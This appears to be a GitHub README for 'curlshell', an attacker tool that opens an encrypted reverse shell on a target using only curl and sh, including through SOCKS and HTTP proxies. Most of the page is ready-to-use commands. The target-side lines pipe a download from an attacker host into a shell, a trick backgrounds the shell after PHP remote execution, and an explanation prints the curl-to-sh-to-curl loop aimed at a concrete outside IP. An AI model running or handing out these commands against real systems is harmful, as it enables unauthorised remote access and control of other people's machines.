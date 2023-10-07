Skip to content

Reverse shell using curl Without Proxy With SOCKS Proxy With HTTP Proxy With HTTP (plaintext) Advanced Tricks How it works

README.md

Reverse shell using curl

(Cloned from https://github.com/irsl/curlshell; slightly enhanced)

An encrypted reverse TCP shell through a proxy (using only cURL).

It allows an attacker to access a remote shell (sh) when the remote system can access the Internet via a Proxy only (or the filesystem is mounted read-only/noexec). The target only needs to have curl and sh installed. Python is not needed and no additonal tools are installed or deployed.

Generate a SSL Certificate (on your system; not the target):

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC"

Without Proxy

# Start your listener (your system)
./curlshell.py --certificate cert.pem --private-key key.pem --listen-port 8080
# On the target:
curl -skfL https://1.2.3.4:8080 | sh

With SOCKS Proxy

./curlshell.py -x socks5h://5.5.5.5:1080 --certificate cert.pem --private-key key.pem --listen-port 8080 
curl -x socks5h://5.5.5.5:1080 -skfL https://1.2.3.4:8080 | sh

With HTTP Proxy

./curlshell.py -x http://5.5.5.5:3128 --certificate cert.pem --private-key key.pem --listen-port 8080 
curl -x http://5.5.5.5:1080 -skfL https://1.2.3.4:8080 | sh

With HTTP (plaintext)

./curlshell.py --listen-port 8080
curl -sfL http://1.2.3.4:8080 | sh

Advanced Tricks

Trick #1 - Spawn a TTY shell

stty intr undef ;
./curlshell.py --shell "script -qc '/bin/bash -il' /dev/null" --listen-port 8080 ; stty intr ^C

Trick #2 - Start the reverse shell as a daemon / background process
This is useful when you have remote execution via PHP:

# On the target:
(curl -sfL http://1.2.3.4:8080 | sh &>/dev/null &)

How it works

The first cURL request pipes this into a target's shell:

exec curl -X POST -sN http://217.138.219.220:30903/input \
    | sh 2>&1 | curl -s -T - http://217.138.219.220:30903/stdout

This command starts two cURL processes and connects another shell's input and output these two cURL. HTTP's 'chunked transfer' (-T) does the rest.

More at https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.

